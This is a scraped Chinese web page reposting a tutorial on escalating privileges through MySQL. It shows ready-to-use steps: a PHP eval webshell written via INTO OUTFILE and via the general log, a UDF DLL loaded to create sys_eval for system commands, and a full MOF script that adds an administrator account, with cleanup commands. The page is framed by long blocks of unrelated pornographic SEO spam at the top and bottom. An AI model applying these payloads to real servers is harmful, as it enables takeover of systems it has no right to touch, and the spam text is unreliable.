午夜视频免费看_日韩三级电影网站_国产精品久久一级_亚洲一级在线播放_人妻体内射精一区二区三区_91夜夜揉人人捏人人添红杏_91福利在线导航_国产又粗又猛又黄又爽无遮挡_欧美日韩一区在线播放_中文字幕一区二区三区四区不卡 _日日夜夜精品视频免费观看_欧美韩日一区二区三区

主頁 > 知識庫 > Mysql提權的多種姿勢匯總

Mysql提權的多種姿勢匯總

熱門標簽:大眾點評星級酒店地圖標注 高清地圖標注道路 話務外呼系統怎么樣 外東北地圖標注 臨清電話機器人 400電話可以辦理嗎 拉卡拉外呼系統 云南電商智能外呼系統價格 智能外呼系統復位

一、寫入Webshell

into outfile 寫shell

前提條件:

1、知道網站物理路徑

2、高權限數據庫用戶

3、load_file() 開啟 即 secure_file_priv 無限制

4、網站路徑有寫入權限

首先基礎語法查詢是否 secure_file_priv 沒有限制

show global variables like '%secure_file_priv%';

value 說明
NULL 不允許導入或導出
/var 只允許在/var目錄導入導出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認是空,這個情況下可以向任意絕對路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認是 NULL,這個情況下不可以寫文件

如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語句來直接寫 shell:

select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標路徑下,已寫入shell.php文件

上菜刀連接

日志文件寫shell

前提條件:

1、Web 文件夾寬松權限可以寫入

2、Windows 系統下

3、高權限運行 MySQL 或者 Apache

MySQL 5.0 版本以上會創建日志文件,可以通過修改日志的全局變量來 getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認關閉,開啟它可以記錄用戶輸入的每條命令,會把其保存在對應的日志文件中。
可以嘗試自定義日志文件,并向日志文件里面寫入內容的話,那么就可以成功 getshell:

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當前日志配置

目標目錄下查看,寫入了log.php文件

寫入shell

select '?php @eval($_POST[cmd]); ?>'

上菜刀,連接


二、UDF提權

自定義函數,是數據庫功能的一種擴展。用戶通過自定義函數可以實現在 MySQL 中無法方便實現的功能,其添加的新函數都可以在SQL語句中調用,就像調用本機函數 version() 等方便。

動態鏈接庫

如果是 MySQL >= 5.1 的版本,必須把 UDF 的動態鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創建自定義函數。

那么動態鏈接庫文件去哪里找呢?實際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對應系統的動態鏈接庫文件。

sqlmap的UDF動態鏈接庫文件位置

sqlmap根目錄/data/udf/mysql

不過 sqlmap 中 自帶這些動態鏈接庫為了防止被誤殺都經過編碼處理過,不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ,

解碼方法如下:

解碼32位的windows動態鏈接庫:

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動態鏈接庫解碼類似

或者直接使用metasploit自帶的動態鏈接庫,無需解碼

Metasploit的UDF動態鏈接庫文件位置

接下來的任務是把 UDF 的動態鏈接庫文件放到 MySQL 的插件目錄下,這個目錄改如何去尋找呢?可以使用如下的 SQL 語句來查詢:

show variables like '%plugin%'


寫入動態鏈接庫

當 secure_file_priv 無限制的時候,我們可以手工寫文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創建自定義函數并調用命令

創建自定義函數

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過創建的這個函數來執行系統命令了:

刪除自定義函數

drop function sys_eval;

三、MOF提權

mof提權原理

關于 mof 提權的原理其實很簡單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行。

嚴苛的前提條件:

1.windows 03及以下版本

2.mysql啟動身份具有權限去讀寫c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數不為null

提權過程:

MOF文件每五秒就會執行,而且是系統權限,我們通過mysql使用load_file 將文件寫入/wbme/mof,然后系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內容讓系統執行命令,進行提權。

利用代碼如下(test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫權限的目錄下:

這里我上傳到了C:\soft\,我們使用sql語句將文件導入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗證提權:

當我們成功把mof導出時,mof就會直接被執行,且5秒創建一次用戶。

關于MOF提權弊端

我們提權成功后,就算被刪號,mof也會在五秒內將原賬號重建,那么這給我們退出測試造成了很大的困擾,所以謹慎使用。那么我們如何刪掉我們的入侵賬號呢?

cmd 下運行下面語句:

#停止winmgmt服務
net stop winmgmt

#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\


# 手動刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# 刪除創建的用戶
net user hpdoger /delete

#重啟服務
net start winmgmt

總結

到此這篇關于Mysql提權姿勢的文章就介紹到這了,更多相關Mysql提權姿勢內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Linux利用UDF庫實現Mysql提權
  • Mysql提權方法利用
  • 提權,以MySQL之名

標簽:山西 溫州 揚州 三明 福州 阿里 無錫 定西

巨人網絡通訊聲明:本文標題《Mysql提權的多種姿勢匯總》,本文關鍵詞  Mysql,提權,的,多種,姿勢,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Mysql提權的多種姿勢匯總》相關的同類信息!
  • 本頁收集關于Mysql提權的多種姿勢匯總的相關信息資訊供網民參考!
  • 推薦文章
    精品久久久久久久久久久久| 欧美乱妇40p| 亚洲一二三在线观看| 女人高潮一级片| 一区中文字幕在线观看| 97香蕉久久超级碰碰高清版| 亚洲精品一区二区三区香蕉| 一本色道久久综合精品竹菊| www精品美女久久久tv| 欧美风情第一页| 久久丫精品国产亚洲av不卡| 麻豆亚洲av成人无码久久精品| 最好看的中文字幕| 三区精品视频观看| 一区二区三区精品国产| 亚洲女人被黑人巨大进入al| 久久久精品国产亚洲| 亚洲区在线播放| 日韩精品视频在线观看网址 | 国产对白在线播放| 久久久久在线观看| 日韩午夜在线视频| 91久久精品一区二区三| 日韩国产欧美在线视频| 久久久久久夜精品精品免费| 国产精品福利在线播放| 久久亚洲一区二区三区四区| 成人高清伦理免费影院在线观看| 一级片手机在线观看| 精品成人av一区二区三区| 日本高清免费观看| 亚洲av片不卡无码久久| 国产男女猛烈无遮挡a片漫画 | 精品国产欧美一区二区| 精品丰满少妇一区二区三区| 97视频久久久| av天堂永久资源网| 久久久久久久一区二区| 国产一区二区丝袜高跟鞋图片| 亚洲最大av网| 亚洲欧美激情一区二区三区| 国产永久免费视频| 欧美日韩一区二区精品| 国产精品视频地址| 先锋在线资源一区二区三区| 天天摸天天碰天天添| www.国产区| 亚洲av无一区二区三区久久| 国产高清自拍视频| 男人的天堂久久久| 少妇久久久久久被弄到高潮| 欧洲亚洲免费视频| 精品99久久久久久| 69p69国产精品| 日韩乱码在线视频| 日韩精品视频在线免费观看 | 日韩av手机在线免费观看| 盗摄精品av一区二区三区| 最新国产成人av网站网址麻豆| 91在线观看免费网站| 午夜激情视频网| 精品乱码一区内射人妻无码| 国产精品88a∨| 国产a一区二区| 日韩欧美激情在线| 中文字幕亚洲欧美一区二区三区| 欧美激情xxxx性bbbb| 99九九视频| 在线视频精品一| 产国精品偷在线| 99精品人妻少妇一区二区| 中文字幕在线观看不卡视频| 欧美喷潮久久久xxxxx| 成人精品aaaa网站| 久久精品国产99久久99久久久| 一级黄色片网址| 日韩欧美视频免费观看| 在线观看国产一区二区三区| 成人精品小蝌蚪| 国产精品影视天天线| gogogo免费视频观看亚洲一| 亚洲人成啪啪网站| 老牛影视免费一区二区| 正在播放亚洲| 最新中文字幕视频| 亚洲乱码国产乱码精品精软件| 久久精品女人毛片国产| 国产成人aaa| 中文字幕高清不卡| 欧美理论电影在线| 色偷偷91综合久久噜噜| 亚洲人成人99网站| 欧美电影精品一区二区| 97久久精品视频| 黄色在线免费播放| 99精品国产99久久久久久97| 91啪亚洲精品| 亚洲精品国产电影| 日韩小视频在线观看专区| 久久综合亚洲社区| 欧美成人性生活| 女人床在线观看| 日韩电影免费一区| 日韩亚洲欧美成人| 天堂久久精品忘忧草| 久久久午夜精品理论片中文字幕| 亚洲国产女人aaa毛片在线| 欧美激情按摩在线| 成人在线观看www| 特大黑人巨人吊xxxx| 亚洲AV无码国产精品午夜字幕| 狠狠色综合播放一区二区| 亚洲人一二三区| 日韩一区二区高清| 国产一区亚洲二区三区| 国产三级精品在线观看| 亚洲私人影院在线观看| 欧美激情一区二区三区成人| 一区二区三区 在线观看视| 一级日韩一区在线观看| 亚洲一区二区三区四区五区中文 | 视频一区二区三区入口| 亚洲激情图片一区| 欧美日韩国产在线观看| 欧美国产一区二区三区| 亚洲精品高清视频| 蜜臀av在线观看| 亚洲第一中文字幕在线观看| 欧美激情精品久久久久| 国产小视频免费| 手机av在线免费观看| 日韩主播视频在线| 精品视频在线播放色网色视频| 中国成人在线视频| 人妻无码中文字幕免费视频蜜桃| 91精品久久久久久久久久入口 | 秋霞毛片久久久久久久久| 婷婷色在线视频| 色狠狠色狠狠综合| 国产在线精品一区二区中文| 国产视频精品免费| 18成人在线观看| 国产精品成人久久久久| 91极品视频在线观看| 亚洲精品毛片一区二区三区| 一区二区成人在线观看| 久久手机在线视频| 久久久久久久久97黄色工厂| 亚洲人成电影网站| 精品欧美一区免费观看α√| 久久精品国产99国产精品| 久久久99精品久久| 91视频-88av| 在哪里可以看毛片| 青草成人免费视频| 中文字幕久久久| 欧美白人最猛性xxxxx69交| 色综合色狠狠天天综合色| √…a在线天堂一区| www.久久精品| 国产精品18久久久久久久久久久久| 天天综合天天综合| 亚洲国产www| 国产又黄又大又爽| av首页在线观看| 日本三级片在线观看| 侵犯稚嫩小箩莉h文系列小说| 国产精品无码在线| 亚洲av无码成人精品区| 亚洲狼人综合干| aa在线免费观看| 色欲色香天天天综合网www| 影音先锋欧美在线| 日韩尤物视频| 欧美午夜欧美| 久久综合九色综合久99| 国产美女精品在线观看| 91成人免费看| 亚洲xxxxx性| 91色在线视频| 91中文字精品一区二区| 91色精品视频在线| 成人激情在线观看| 91中文精品字幕在线视频| 国产精品视频免费观看www| 国产精品久久一区主播| 国产精品青青在线观看爽香蕉 | 99久久精品无码一区二区毛片| 国产精品欧美一区二区三区奶水| 国产成人亚洲综合青青| 全亚洲最色的网站在线观看| 欧美综合第一页| 欧美一级大片在线免费观看| 欧美激情18p| 91国产在线精品| 国产91热爆ts人妖在线| 国产精品久久二区| 成人黄色av网| 成人免费视频视频在| 国精产品一区二区| 久久av一区二区三区亚洲| 波多野结衣 在线| 精品国产31久久久久久| 午夜免费福利视频在线观看| 日韩精品1区2区3区| 激情五月六月婷婷| 黄色成人在线免费观看| 亚洲 自拍 另类小说综合图区| 人妻激情另类乱人伦人妻| 欧美午夜性视频| 久久精品国产精品亚洲色婷婷| 可以在线看的黄色网址| 日本中文字幕精品—区二区| 能看毛片的网站| 大尺度做爰床戏呻吟舒畅| xxx在线播放| 玖玖爱这里只有精品| 日韩精品一区二区在线播放 | 亚洲熟女乱色一区二区三区| 天天操天天摸天天爽| aaaaaaaa毛片| 亚洲а∨天堂久久精品2021| 欧美xxxx黑人xyx性爽| 天堂网免费视频| www.久久久久久| 蜜臀av性久久久久蜜臀aⅴ流畅 | 亚洲成人自拍视频| 黄色成人在线免费观看| 国产九九在线视频| 中出视频在线观看| 国产一二三四区| 自拍偷拍精品视频| 污污视频在线观看网站| 国模一区二区三区白浆| 久久伊人蜜桃av一区二区| 1024亚洲合集| 欧美日韩一级片在线观看| 日韩成人网免费视频| 色综合久久中文字幕综合网小说| 国产精品美女午夜av| 蜜桃传媒视频麻豆一区| 国产精品一色哟哟| 伦伦影院午夜理论片| av永久免费观看| 日韩黄色片网站| 久久久综合网| 久久久午夜精品理论片中文字幕| 午夜天堂影视香蕉久久| 日韩欧美一区在线观看| 美乳少妇欧美精品| 91免费在线视频网站| 曰韩不卡视频| 在线免费看v片| 欧美h片在线观看| 国产免费高清视频| 国产精品系列在线播放| 一区二区三区在线观看欧美| 欧美一二三四在线| 欧美高清视频免费观看| 91久久伊人青青碰碰婷婷| 成人区一区二区| www.超碰97| www毛片com| 六月婷婷色综合| 亚洲精品成人a在线观看| 日韩欧美久久久| 91av视频在线观看| 日本一区免费| 182午夜视频| 久草视频免费在线| 性感美女一级片| 国产精品视频免费| 日韩欧美的一区| 欧美性做爰毛片| 亚洲一区免费看| 天天爽夜夜爽视频| 国产精品久久久久久久久久久久久久久久久 | 精品在线小视频| 国产精选久久久久久| avove在线观看| 青青草视频成人| 国产精品亚洲lv粉色| 波多野洁衣一区| 日本福利一区二区| 蜜臀久久99精品久久久无需会员| 精品综合久久久| 天天操天天干天天做| 精品久久免费视频| 精品一区二区三区的国产在线播放 | 欧美色成人综合| 久久久久久国产三级电影| 伊人伊成久久人综合网小说| 中文字幕视频在线免费欧美日韩综合在线看| 91成人免费观看网站| 欧美午夜欧美| 天天色天天干天天色| 亚洲色成人www永久网站| 高清不卡一二三区| 日本福利一区二区| 欧美在线观看网站| 欧美视频在线观看视频| 色屁屁草草影院ccyy.com| 丰满人妻av一区二区三区| 国产精品成人在线观看| 亚洲天堂第一页| 韩日午夜在线资源一区二区| 麻豆传媒在线看| 国产免费无遮挡| 国产精品第五页| 色阁综合伊人av| 亚洲成人av动漫| 少妇精品一区二区| 黄色av一区二区三区| 一区二区久久久久久| 欧美成年人网站| 青青在线免费视频| 中文字幕电影av| 国产精品18久久久久久久久久久久 | 蜜臀久久99精品久久久| 亚洲国产精品一区二区久久恐怖片| 久久久精品日本| 99精品视频网站| 欧美特级一级片| 国产成人一区在线| 精品99一区二区| 好吊妞www.84com只有这里才有精品 | 99久在线精品99re8热| 99re这里只有精品6| 精品一区二区电影| 久久久久久一区| 亚洲av无码一区二区三区人 | 日韩三级视频在线| 96av麻豆蜜桃一区二区| 亚洲日本中文字幕| 亚洲日本无吗高清不卡| 久久国产精品国语对白| 成人白浆超碰人人人人| 日韩精品高清在线观看| 日韩av电影免费在线| 国产精品18在线| 国产传媒一区在线| 亚洲精品mp4| 日韩高清国产一区在线观看| 国产欧美小视频| 国产精品中文字幕一区二区三区| 欧美成人一区二区三区片免费| 粉嫩av四季av绯色av第一区| 极品白嫩丰满美女无套| 日韩精品电影在线观看| 3d动漫精品啪啪1区2区免费| 国产不卡一区二区在线观看| 玖玖爱在线观看| 国产乱人伦偷精品视频不卡| 亚洲精品美女久久久久| 亚洲一区二区三区加勒比| 久久久久久久九九九九| 欧美激情在线一区二区| 欧美激情在线播放| 精品99在线视频| av中文在线观看| 欧美影片第一页| 国产精品视频一区二区三区经| 久久精品一区二区免费播放| 国产馆精品极品| 国产小视频国产精品| 国产美女作爱全过程免费视频| 中文字幕一区二区人妻视频| 亚洲一区av在线| 国产精品中文字幕在线观看| 9.1成人看片| 成人av在线资源网站| 久久精品国产精品亚洲| 人妻丰满熟妇av无码区app| 国产1区在线观看| 日韩视频在线一区二区| 日韩高清国产一区在线观看| 亚洲一区二区91| 一区二区三区中文字幕精品精品| 国产精品看片资源| 国产精品jizz| 2021中文字幕一区亚洲| 欧美精品久久久久| 欧美一级视频在线| 久久精品二区亚洲w码| 精品一区二区三区电影| 浮妇高潮喷白浆视频| 韩国av免费在线观看| 日韩一区二区三区在线视频| 亚洲欧美日韩精品在线| 久久午夜鲁丝片| 欧美私人免费视频| 日本在线观看一区二区| 销魂美女一区二区| 欧美自拍偷拍一区| 日韩免费av电影| 中文字幕乱伦视频| 欧美美女黄视频| 中文网丁香综合网| 国产精品视频一区二区三区,| 欧美丰满美乳xxx高潮www| 一区二区不卡在线| 国产剧情久久久| 精品久久久久久亚洲综合网| 永久免费网站视频在线观看| www.久久精品.com| 精品性高朝久久久久久久| 无码精品国产一区二区三区免费| 日韩国产精品久久| 中文字幕免费精品一区高清| 色男人天堂av|